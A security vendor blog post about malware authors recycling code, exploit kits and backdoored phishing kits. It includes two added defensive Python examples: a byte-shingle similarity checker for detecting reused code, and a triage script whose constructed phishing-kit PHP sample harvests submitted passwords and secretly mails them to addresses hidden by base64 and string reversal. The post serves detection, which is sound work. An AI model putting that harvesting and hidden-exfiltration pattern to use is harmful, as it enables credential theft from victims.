Developers are known for reusing code over and over again: if it isn’t broken, why fix it? That habit is much of what makes open source so popular and valuable. Rather than writing everything from scratch, developers can take existing open source code and adapt it to their current needs.
Unfortunately, legitimate developers are not the only ones who work this way. Malware authors also recycle and repackage older exploits and malware components that worked well in the past, and present the result as a new threat. Worse still, many of these reused threats are paired with new and more sophisticated infection strategies, which makes them harder to defend against.
Most new malware isn’t new
With all the different statistics coming out about new malware, it’s easy to assume that the internet and connected systems are flooded with threats. G Data, for instance, reported identifying new malware samples at a rate of roughly one every 4 seconds during Q1 of 2017, which works out to close to 2 million new samples in a single quarter.
While it’s certainly true that there is a considerable number of malware samples for attackers to choose from, many of them aren’t exactly new.
“Most of it is actually a Frankenstein-version that consists of chunks of code that have been pieced together from existing malware or publicly released vulnerabilities and tools,” Secplicity pointed out.
In this way, attackers take existing code and capabilities and add their own functionality on top. Because the recombined file hashes differently from anything seen before, the result registers as a new malware sample even though most of its code is old.
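The "Frankenstein" pattern described above is also what makes recycled code detectable: two samples that differ in every whole-file hash can still share long, identical byte runs. The following is an added example, not code from the article, G Data or Secplicity. It compares two samples by their sets of 8-byte windows ("shingles") and extends matching windows into the longest shared run, which is the material an analyst would lift into a YARA string. The three samples are constructed in the block (a 256-byte routine copied from sample A into sample B, plus an unrelated sample C); with real files you would read the bytes from disk instead.

```python
"""
Added example (not from the article, G Data or Secplicity): detect recycled
code between two samples by comparing byte n-grams ("shingles"). The samples
are constructed; in practice read them from files with open(path, "rb").
"""
import hashlib


def pseudo_random(seed: str, length: int) -> bytes:
    """Deterministic filler bytes that stand in for unrelated code sections."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(f"{seed}:{counter}".encode()).digest()
        counter += 1
    return out[:length]


def shingles(data: bytes, n: int = 8) -> set:
    """All length-n byte windows of data; n=8 makes chance matches negligible."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a: set, b: set) -> float:
    """Overall similarity: shared shingles over all distinct shingles."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def containment(part: set, whole: set) -> float:
    """Fraction of part's shingles also present in whole (1.0 = fully reused)."""
    return len(part & whole) / len(part) if part else 0.0


def longest_shared_run(a: bytes, b: bytes, n: int = 8) -> tuple:
    """(length, offset_in_a, offset_in_b) of the longest byte run common to a and b.

    Seeds on matching shingles and extends them, so the cost scales with the
    number of matches rather than with len(a) * len(b)."""
    index = {}
    for j in range(len(b) - n + 1):
        index.setdefault(b[j:j + n], []).append(j)
    best = (0, -1, -1)
    for i in range(len(a) - n + 1):
        for j in index.get(a[i:i + n], ()):
            k = n
            while i + k < len(a) and j + k < len(b) and a[i + k] == b[j + k]:
                k += 1
            if k > best[0]:
                best = (k, i, j)
    return best


def compare(a: bytes, b: bytes, n: int = 8, min_run: int = 64) -> dict:
    """Summarise what a and b share; min_run is the shortest run worth a YARA string."""
    sa, sb = shingles(a, n), shingles(b, n)
    run, off_a, _ = longest_shared_run(a, b, n)
    return {
        "jaccard": round(jaccard(sa, sb), 3),
        "containment_a_in_b": round(containment(sa, sb), 3),
        "longest_shared_run": run,
        "shared_chunk_hex": a[off_a:off_a + min(run, 16)].hex() if run else "",
        "reuse_suspected": run >= min_run,
    }


# Constructed samples: B lifts a 256-byte routine from A and wraps it in new
# code; C is unrelated. The whole-file hashes of all three differ, so each
# would be counted as a "new" sample.
REUSED_ROUTINE = pseudo_random("reused-routine", 256)
SAMPLE_A = pseudo_random("a-head", 300) + REUSED_ROUTINE + pseudo_random("a-tail", 200)
SAMPLE_B = pseudo_random("b-head", 150) + REUSED_ROUTINE + pseudo_random("b-tail", 400)
SAMPLE_C = pseudo_random("unrelated", 800)

if __name__ == "__main__":
    print("A vs B:", compare(SAMPLE_A, SAMPLE_B))
    print("A vs C:", compare(SAMPLE_A, SAMPLE_C))
```

The Jaccard score for A and B stays low (about 0.19) because most of each file is new code, which is exactly why whole-file similarity alone under-reports reuse; the longest shared run, by contrast, recovers the entire copied routine. Production tools such as ssdeep and TLSH apply the same idea with compressed fingerprints, and a YARA rule built from the shared chunk will match both samples and any future variant that keeps the routine.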
Motivations for reuse
There are several reasons why this reuse and recycling approach is popular among attackers. First and foremost, it saves them time. Instead of writing new code for a basic function, it is much faster to drop in a section of code the attacker already knows works. As security analyst Marc Laliberte pointed out, the time saved can then be spent on more pressing pursuits.
“Why reinvent the wheel when another author already created a working solution?” Laliberte wrote. “By copying code wherever possible, malware authors have more time to focus on other areas, like detection avoidance and attribution masking.”
In addition to reusing code to save time, many cybercriminals also recycle proven capabilities simply because they have worked in the past. This is why there are countless variants of the same ransomware families, spear-phishing lures and other established tactics.
Making code available: Malware and exploit kits
Access to reusable code has also become trivial thanks to malware, exploit and phishing kits. A kit bundles everything a threat needs (for example, a set of browser exploits with a payload loader, or the cloned login pages and mail scripts of a phishing site) into a single package that is sold on underground marketplaces or hosted on compromised websites, so the buyer needs little more than to configure it.
For instance, Sensors Tech Forum contributor Milena Dimitrova reported on research that examined 66,000 URLs and over 7,800 phishing kits and found two kits in particular deployed across more than 30 compromised hosts.
In addition to selling kits, some authors distribute backdoored kits: alongside the address the buyer configures, the kit quietly sends a copy of every harvested credential to the author, so the author profits from each deployment and gains access to every victim the buyer compromises.
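The backdoor in a phishing kit is usually nothing more than a second recipient for the credentials, written so it is not obvious to whoever bought the kit. The following is an added example, not code from the article or from any kit it describes: a triage script that lists every address a kit's PHP source can deliver to, including addresses hidden behind `base64_decode()` and `strrev()`, and reports the ones the deployer did not knowingly configure. The kit fragment and all addresses (`operator@example.com`, `kitauthor@example.net`, `collector@example.net`) are constructed for the example.

```python
"""
Added example (not from the article or any kit it describes): triage a phishing
kit's PHP source for hidden recipients. The kit fragment below is constructed.
"""
import base64
import binascii
import re

# Addresses written in the clear, plus the two obfuscation styles kits commonly
# use to hide the author's copy: base64_decode("...") and strrev("...").
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
STRREV_RE = re.compile(r"strrev\(\s*['\"]([^'\"]+)['\"]\s*\)")

# Constructed kit fragment. A real kit carries the obfuscated literals directly;
# they are built here so the sample stays readable.
_AUTHOR_B64 = base64.b64encode(b"kitauthor@example.net").decode()
_COLLECTOR_REV = "collector@example.net"[::-1]
KIT_SOURCE = r'''<?php
$recipient = "operator@example.com";   // address the buyer configures
$message = "Email: " . $_POST['email'] . "\nPassword: " . $_POST['password'];
$headers = "From: Account Security";
mail($recipient, "New Login", $message, $headers);
// Hidden copies for the kit author, obfuscated to survive a casual read.
$__z = base64_decode("''' + _AUTHOR_B64 + r'''");
mail($__z, "New Login", $message, $headers);
@mail(strrev("''' + _COLLECTOR_REV + r'''"), "New Login", $message, $headers);
header("Location: https://login.example.com/");
'''


def find_recipients(src: str) -> dict:
    """Map every e-mail address the source can deliver to -> how it was written."""
    found = {}
    for m in B64_RE.finditer(src):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64, so it cannot hide an address this way
        for addr in EMAIL_RE.findall(decoded):
            found.setdefault(addr, "base64")
    for m in STRREV_RE.finditer(src):
        for addr in EMAIL_RE.findall(m.group(1)[::-1]):
            found.setdefault(addr, "strrev")
    for m in EMAIL_RE.finditer(src):
        found.setdefault(m.group(0), "plain")
    return found


def hidden_recipients(src: str, declared) -> dict:
    """Addresses other than the ones the deployer knowingly configured."""
    known = set(declared)
    return {addr: how for addr, how in find_recipients(src).items() if addr not in known}


if __name__ == "__main__":
    for addr, how in hidden_recipients(KIT_SOURCE, ["operator@example.com"]).items():
        print(f"hidden recipient {addr} (written as {how})")
```

Any address the script reports that the deployer did not configure is a backdoor candidate. The regular expressions only cover the two obfuscations shown; kits also hide addresses in `eval(gzinflate(...))` blobs, `chr()` sequences or remote includes, so an empty result is a reason to keep reading the source, not a clean bill of health.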
Examples of reuse
Let’s take a look at a few cases in which attackers borrowed code from another malware author:
Threat reuse on the horizon
According to Trend Micro’s 2018 Security Predictions report, this style of threat reuse shows no sign of stopping. The report forecasts that familiar delivery techniques, such as those used to spread email and web-based spam, will resurface in the service of fake news campaigns.
“From spear-phishing emails sent to foreign ministries to the blatant use of documents to discredit authorities, dubious content can spread freely and spark forceful opinions or even real protests,” the 2018 Security Predictions Report stated. “Manipulated political campaigns will continue to mount smear tactics and deliberately shift public perception, as allowed by the tools and services readily available in underground marketplaces. It is likely that the upcoming Swedish general election will not be exempt from attempts to influence the voting outcome through fake news.”
This makes attackers’ capabilities even more damaging than before. Because ready-made threats are sold on underground marketplaces, an attacker no longer needs to write code at all: they can buy a pre-built threat and reuse it with minor modifications that are enough to change its hash and reduce the chance of signature-based detection.
Protecting against new and old threats
Because new threats will continue to reuse established tactics, organizations should take the following steps to protect their brands, their technology investments and their critical data:
To find out more, connect with the experts at Trend Micro today.